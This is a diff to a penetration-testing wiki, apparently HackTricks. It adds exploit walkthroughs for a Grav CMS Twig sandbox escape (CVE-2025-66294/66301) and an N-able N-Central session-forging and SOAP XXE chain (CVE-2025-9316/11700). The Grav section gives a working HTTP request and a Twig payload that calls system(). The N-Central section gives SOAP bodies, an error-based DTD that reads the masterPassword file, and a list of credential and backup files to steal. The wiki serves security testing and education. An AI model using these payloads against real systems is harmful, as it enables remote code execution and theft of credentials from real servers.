Metasploit Wrap-Up 12/19/2025

src/SUMMARY.md

@@ -375,6 +375,7 @@
     - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
   - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
   - [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
+  - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md)
   - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
   - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
   - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)

src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md

@@ -81,3 +81,4 @@ adb shell ime help
 - **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices.
 - **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI).
 
+{{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/ssti-server-side-template-injection/README.md

@@ -549,6 +549,30 @@ $output = $twig > render (
 - In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
 
+#### Grav CMS evaluate_twig sandbox escape (CVE-2025-66294 + CVE-2025-66301)
+
+Grav CMS versions prior to <code>1.8.0-beta.27</code> sanitize Twig by running <code>cleanDangerousTwig</code> before <code>evaluate_twig</code>, but the regex fails to strip nested calls. By abusing CVE-2025-66301 an authenticated but low-privileged user can still reach <code>/admin/pages/{page}</code> and edit the form "process" section, storing Twig that will later execute with sandbox restrictions disabled.
+
+1. **Add a form that re-evaluates user input.** The page editor accepts JSON inside <code>data[_json][header][form]</code>. Submitting the snippet below wires the form field "name" into <code>evaluate_twig</code>, so whatever the victim submits later becomes a Twig expression:
+
+```http
+POST /admin/pages/contact/:add HTTP/1.1
+Host: grav.local
+Content-Type: application/x-www-form-urlencoded
+
+_task=save&data[_json][header][form]={"name":"abuse","fields":{"name":{"type":"text","label":"Name"}},"process":[{"message":"{{ evaluate_twig(form.value('name')) }}"}]}
+```
+
+2. **Abuse undefined-function callbacks to reach PHP.** When the attacker or another user submits the public form at <code>/contact</code>, the value stored in <code>data[name]</code> hits <code>evaluate_twig</code>. The payload below registers <code>system()</code> as the handler for undefined Twig functions, disables the sandbox flag, and calls the command string:
+
+```twig
+{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }}
+{% set _ = grav.config.set('system.twig.undefined_functions', false) %}
+{{ grav.twig.twig.getFunction('bash -c id') }}
+```
+
+3. **Deliver platform-specific shells.** The Metasploit module <code>multi/http/grav_twig_ssti_sandbox_bypass_rce</code> automatically swaps the payload for <code>cmd/unix/*</code> or <code>cmd/windows/*</code> stagers and can compress or base64-encode longer commands to fit inside the Twig expression.
+
 ### Plates (PHP)
 
 Plates is a templating engine native to PHP, drawing inspiration from Twig. However, unlike Twig, which introduces a new syntax, Plates leverages native PHP code in templates, making it intuitive for PHP developers.
@@ -1155,5 +1179,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
 - [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection)
 - [0xdf – HTB: Editor (XWiki SolrSearch Groovy RCE → Netdata ndsudo privesc)](https://0xdf.gitlab.io/2025/12/06/htb-editor.html)
 - [XWiki advisory – `SolrSearch` RSS Groovy RCE (GHSA-rr6p-3pfg-562j / CVE-2025-24893)](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j)
+- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
+- [Metasploit Module – multi/http/grav_twig_ssti_sandbox_bypass_rce.rb](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/grav_twig_ssti_sandbox_bypass_rce.rb)
 
 {{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/web-vulnerabilities-methodology.md

@@ -28,6 +28,9 @@ In every Web Pentest, there are **several hidden and obvious places that might b
 > Most of the web applications will **allow users to input some data that will be processed later.**\
 > Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply.
 
+> [!NOTE]
+> Keep an eye on privileged workflows (installation wizards, XML/SOAP "hello" calls, or CMS page builders). If they create sessions before enforcing ACLs you can often chain them with attacks such as [XXE - XEE - XML External Entity](xxe-xee-xml-external-entity.md) or [SSTI (Server Side Template Injection)](ssti-server-side-template-injection/index.html) to reach file disclosure or RCE even when the dangerous endpoint was meant to be post-authentication.
+
 ### **Reflected Values**
 
 If the introduced data may somehow be reflected in the response, the page might be vulnerable to several issues.
@@ -211,4 +214,8 @@ Modern applications extend into browsers, wallets, and automation pipelines—ke
 - [ ] [**Browser Extension Pentesting**](browser-extension-pentesting-methodology/)
 - [ ] [**wfuzz Web Fuzzing**](web-tool-wfuzz.md)
 
+## References
+
+- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
+
 {{#include ../banners/hacktricks-training.md}}

src/pentesting-web/xxe-xee-xml-external-entity.md

@@ -769,6 +769,48 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
 
 Take a look to this amazing report [https://swarm.ptsecurity.com/impossible-xxe-in-php/](https://swarm.ptsecurity.com/impossible-xxe-in-php/)
 
+### Chaining unauthenticated session bypass with SOAP XXE (N-able N-Central)
+
+N-able N-Central (<code>2025.4.0.9</code>) exposes SOAP endpoints that can be abused in tandem: CVE-2025-9316 lets you mint a session without credentials and CVE-2025-11700 lets that session import attacker-supplied XML. The result is an unauthenticated arbitrary file read that leaks the contents of N-Central's own configuration and backup artifacts.
+
+1. **Forge a session without credentials.** The <code>sessionHello</code> method on <code>/dms/services/ServerUI</code> accepts arbitrary appliance IDs and returns a <code>&lt;sessionID&gt;</code> even for unauthenticated clients. Brute-force the <code>applianceId</code> range (e.g., 1–30) until the server returns <code>200</code> plus a cookie:
+
+```xml
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Body>
+    <ns1:sessionHello xmlns:ns1="http://www.n-able.com/mickey">
+      <applianceId>7</applianceId>
+    </ns1:sessionHello>
+  </soapenv:Body>
+</soapenv:Envelope>
+```
+
+2. **Stage a malicious log entry.** Reuse the hijacked session with <code>applianceLogSubmit</code> to write a base64-encoded service-template file under <code>/opt/nable/webapps/ROOT/applianceLog/network_check_log_&lt;ID&gt;.log</code> (the path is controllable via <code>LOG_PATH</code>). The payload is just XML that points to your DTD server:
+
+```xml
+<ns1:applianceLogSubmit xmlns:ns1="http://www.n-able.com/mickey">
+  <sessionID>1234567</sessionID>
+  <logType>NETWORK_CHECK_LOG</logType>
+  <contents>PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBF...</contents>
+</ns1:applianceLogSubmit>
+```
+
+3. **Trigger the unsafe import.** Call <code>importServiceTemplateFromFile</code> on <code>/dms/services/ServerUI</code> and point <code>filePath</code> to the log you just wrote. When the server parses the file it will fetch your DTD over HTTP (self-signed HTTPS will fail with PKIX errors).
+
+4. **Error-based DTD exfiltration.** Serve a DTD that resolves a local file and injects the bytes into an error message by referencing a non-existent path. The contents show up inside the SOAP fault that bubbles back to the attacker:
+
+```xml
+<!ENTITY % file SYSTEM "file:///opt/nable/etc/masterPassword">
+<!ENTITY % boom "<!ENTITY error SYSTEM 'file:///nope/%file;'>"> 
+%boom; %error;
+```
+
+**Operational notes**
+
+- Interesting loot includes <code>/opt/nable/var/ncsai/etc/ncbackup.conf</code>, <code>/var/opt/n-central/tmp/ncbackup/ncbackup.bin</code> (PostgreSQL dumps), <code>/opt/nable/etc/keystore.bcfks</code>, <code>/opt/nable/etc/masterPassword</code>, and the usual <code>/etc/passwd</code>/<code>shadow</code> pairs.
+- Because the file read happens inside a SOAP fault you can script the extraction by parsing the <code>&lt;detail&gt;&lt;string&gt;</code> element for the leaked bytes.
+- Set the DTD server to HTTP (<code>DTD_PROTO=http</code>) unless you can present a certificate the Java stack trusts.
+
 ## Tools
 
 
@@ -916,5 +958,7 @@ References for this vector are listed at the end of the page.
 - [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core XXE/SSRF + Path Traversal)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
 - [Xerox FreeFlow Core Security Guide (architecture/ports)](https://securitydocs.business.xerox.com/wp-content/uploads/2025/03/Security-Guide-Information-Assurance-Disclosure-Xerox-FreeFlow-Core-8.0.pdf)
 - [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
+- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
+- [Metasploit Module – scanner/http/nable_ncentral_auth_bypass_xxe.rb](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe.rb)
 
 {{#include ../banners/hacktricks-training.md}}